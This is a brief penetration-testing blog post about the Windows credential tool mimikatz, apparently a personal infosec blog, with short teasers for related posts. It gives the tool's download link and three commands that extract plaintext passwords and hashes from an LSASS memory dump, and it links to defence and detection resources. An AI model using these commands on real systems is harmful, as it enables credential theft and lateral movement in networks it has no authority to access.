Viral Maniar

Viral Maniar

InfoSec

Internal Infrastructure Pentest - Mimikatz

less than 1 minute read

Mimikatz: mimikatz is a tool gentilkiwi made to learn C and make somes experiments with Windows security. It’s now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

Download: https://github.com/gentilkiwi/mimikatz/releases

Commands to run on lsass dump file:

mimikatz # privilege::debug
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords

Blogs:

https://adsecurity.org/?page_id=1821
https://www.sans.org/reading-room/whitepapers/detection/mimikatz-overview-defenses-detection-36780
https://www.offensive-security.com/metasploit-unleashed/mimikatz/
http://blog.gentilkiwi.com/mimikatz

Share on

Twitter Facebook LinkedIn

You may also enjoy

Destroying Cloud Infrastructure with Nuking Tools

4 minute read

Cloud computing has become the backbone of countless businesses, ensuring the security of cloud infrastructure is of utmost importance. Misconfigurations, un...

Installing Kali in AWS EC2 Instance

less than 1 minute read

sudo passwd kali sudo apt-get update sudo apt-get install xrdp lxde-core lxde tigervnc-standalone-server -y cd / sudo sed -i ‘s/allowed_users=.*/a...

Brace Yourself: Cyber Attacks on Australian Businesses Set to Skyrocket

2 minute read

Brace Yourself: Cyber Attacks on Australian Businesses Set to Skyrocket

The Power of In-Memory Executions: How to Execute Code without Touching Disk

6 minute read

In-memory execution is a technique used by malware developers to evade detection by traditional antivirus solutions. Instead of writing their malicious code ...